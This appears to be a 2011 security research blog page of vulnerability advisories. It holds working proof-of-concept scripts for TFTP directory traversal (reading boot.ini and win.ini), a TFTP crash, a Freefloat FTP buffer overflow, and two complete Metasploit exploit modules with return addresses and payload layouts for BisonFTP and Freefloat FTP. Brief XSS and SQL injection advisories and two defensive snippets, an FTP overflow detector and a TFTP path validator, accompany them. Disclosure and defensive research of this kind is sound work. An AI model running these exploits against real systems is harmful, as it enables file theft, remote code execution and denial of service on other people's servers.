Ipswitch TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a directory traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused by improper validation of Read requests containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Any feedback or suggestions are welcome.

Cheers!
SecPod Research Team

GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found multiple cross-site scripting vulnerabilities in GoAhead WebServer. The vulnerabilities are caused by improper validation of input to the ‘name’ and ‘address’ parameters of the /goform/formTest page. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Any feedback or suggestions are welcome.

Cheers!
SecPod Research Team

Dec 2nd, 2011 | Filed under Advisories

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a denial of service vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused by improper validation of the file name field in WRITE/READ requests when it contains an overly long file name. The flaw can be exploited to crash the service.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "\x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
## Re-probe the service. UDP has no handshake and connect() on a datagram
## socket never contacts the host, so send a harmless read request and wait
## for any reply (data or error packet); no reply within the timeout means
## the server most likely crashed.
try:
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    probe.settimeout(3)
    probe.sendto("\x00\x01" + "probe.txt" + "\0" + "netascii" + "\0", (target, port))
    probe.recv(1024)
    probe.close()
except socket.error:
    print "Remote TFTP server port is down..."
    sys.exit(1)

Any feedback or suggestions are welcome.

Cheers!
SecPod Research Team

Dec 2nd, 2011 | Filed under Advisories

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

SecPod Research Team member (Veerendra G.G) wrote a Metasploit module for the BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the BisonFTP Server <= v3.5 .
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

Any feedback or suggestions are welcome.
Cheers!
SecPod Research Team

Sep 7th, 2011 | Filed under Exploits, Metasploit

Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member (Veerendra G.G) wrote a Metasploit module for the Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

Any feedback or suggestions are welcome.
Cheers!
SecPod Research Team

Sep 7th, 2011 | Filed under Exploits, Metasploit

Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found multiple vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerabilities are caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

Sep 7th, 2011 | Filed under Advisories

MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities

SecPod Research Team member (Sooraj K.S) has found multiple XSS and SQL injection vulnerabilities in MYRE Real Estate Software. The vulnerabilities are caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

Sep 7th, 2011 | Filed under Advisories

Apache ActiveMQ Source Code Disclosure Vulnerability

SecPod Research Team member (Veerendra G.G) has found an information disclosure vulnerability in Apache ActiveMQ. The flaw is caused by input validation errors while processing URLs, which can be exploited to view the source code of a visited page and may lead to further attacks.

More information on the flaws can be found here.

Sep 7th, 2011 | Filed under Advisories

Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities

SecPod Research Team member (Veerendra G.G) has found multiple buffer overflow vulnerabilities in Freefloat FTP Server. The flaws are caused by input validation errors while processing the DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE and STAT commands. The buffer is overflowed by sending overly long command arguments, which can be exploited to execute arbitrary code or crash a vulnerable server, denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)
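The overflow above and the APPE Metasploit module earlier on this page both arrive on the FTP control channel as a short command followed by an argument that is far longer than any real path. The following Python 3 snippet is an added example, not SecPod's code: it inspects client control-channel lines and flags the commands the advisory lists when their argument exceeds an assumed threshold, contains NOP padding, or carries non-printable bytes. The sample session at the bottom is constructed here for illustration.

```python
import re

# Commands the advisory lists as overflowing on an overly long argument
FREEFLOAT_VULN_CMDS = {"DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO",
                       "STOU", "STOR", "SIZE", "APPE", "STAT"}
MAX_ARG_LEN = 200          # assumed threshold; legitimate paths are far shorter
NOP_SLED = b"\x90" * 8     # run of NOPs typical of the padding in such exploits

# One FTP control-channel line: command, optional SP + argument, CRLF
FTP_LINE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?\r\n$", re.DOTALL)

def inspect_ftp_line(line):
    """Classify one client line; return a finding dict, or None if benign."""
    m = FTP_LINE.match(line)
    if not m:
        return {"command": None, "arg_len": len(line), "reason": "malformed line"}
    cmd = m.group(1).decode("ascii").upper()
    arg = m.group(2) or b""
    if NOP_SLED in arg:
        return {"command": cmd, "arg_len": len(arg), "reason": "NOP sled in argument"}
    if cmd in FREEFLOAT_VULN_CMDS and len(arg) > MAX_ARG_LEN:
        return {"command": cmd, "arg_len": len(arg), "reason": "oversized argument"}
    if any(b > 0x7e or b < 0x20 for b in arg):
        return {"command": cmd, "arg_len": len(arg), "reason": "non-printable bytes"}
    return None

def scan_session(stream):
    """Split a captured client-to-server byte stream into lines, collect findings."""
    findings = []
    for line in stream.splitlines(keepends=True):
        finding = inspect_ftp_line(line)
        if finding:
            findings.append(finding)
    return findings

# Constructed sample session: a normal login followed by two attack-shaped lines,
# one like the PoC above (1000 x "A") and one like the APPE module (NOP padding).
SAMPLE_STREAM = (b"USER test\r\nPASS test\r\nPWD\r\n"
                 b"STOR " + b"A" * 1000 + b"\r\n"
                 b"APPE " + b"\x90" * 246 + b"XXXX" + b"\r\n"
                 b"QUIT\r\n")

if __name__ == "__main__":
    for f in scan_session(SAMPLE_STREAM):
        print(f)
```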

Any feedback or suggestions are welcome.
Cheers!
SecPod Research Team

Aug 4th, 2011 | Filed under Advisories

CiscoKits TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Antu Sanadi) has found a directory traversal vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused by improper validation of Read requests containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory  : http://secpod.org/blog/?p=301
#             http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
#             http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version   : CiscoKits CCNA TFTP Server 1.0.0.0
# Date      : 21/07/2011
##############################################################################
import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                        ## The Server IP
    PORT = 69                                 ## Default TFTP port

    data = "\x00\x01"                         ## TFTP Read Request
    data += "../" * 10 + "windows/win.ini" + "\x00"  ## Read windows/win.ini using directory traversal
    data += "netascii\x00"                    ## TFTP Type

    # netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()
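The Ipswitch and CiscoKits traversal PoCs on this page, and the Hillstone long-file-name crash, all come down to a TFTP server trusting the file name field of a read or write request. The following Python 3 code is an added example, not SecPod's or any vendor's: a server-side request check that parses the RFC 1350 RRQ/WRQ layout and refuses names that escape the served directory or exceed a length limit. TFTP_ROOT and MAX_FILENAME are assumed values.

```python
import os
import struct

TFTP_RRQ, TFTP_WRQ = 1, 2
TFTP_ROOT = "/srv/tftp"   # assumed served directory
MAX_FILENAME = 255        # assumed limit; the PoCs above send far longer names

class TftpRequestError(ValueError): pass

def parse_request(packet):
    """RRQ/WRQ layout: 2-byte opcode, NUL-terminated filename, NUL-terminated mode."""
    if len(packet) < 4:
        raise TftpRequestError("packet too short")
    opcode = struct.unpack("!H", packet[:2])[0]
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        raise TftpRequestError("not a read/write request")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:  # filename, mode and the empty tail after the final NUL
        raise TftpRequestError("missing NUL terminator")
    return opcode, fields[0], fields[1].lower()

def resolve_safe_path(filename, root=TFTP_ROOT):
    """Map a client file name onto root; refuse anything that escapes it."""
    if not filename or len(filename) > MAX_FILENAME:
        raise TftpRequestError("empty or over-long filename")
    try:
        name = filename.decode("ascii")
    except UnicodeDecodeError:
        raise TftpRequestError("non-ASCII filename")
    if name.startswith("/") or "\\" in name:
        raise TftpRequestError("absolute or backslash path")
    root_abs = os.path.abspath(root)
    candidate = os.path.abspath(os.path.join(root_abs, name))
    # Normalisation folds every "../"; the result must still sit under root.
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        raise TftpRequestError("path escapes TFTP root")
    return candidate

def check_request(packet):
    """Return (opcode, absolute path) for an acceptable request, else raise."""
    opcode, filename, mode = parse_request(packet)
    if mode not in (b"netascii", b"octet"):
        raise TftpRequestError("unsupported transfer mode")
    return opcode, resolve_safe_path(filename)

def is_safe_request(packet):
    try:
        check_request(packet)
        return True
    except TftpRequestError:
        return False
```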

Any feedback or suggestions are welcome.
Cheers!
SecPod Research Team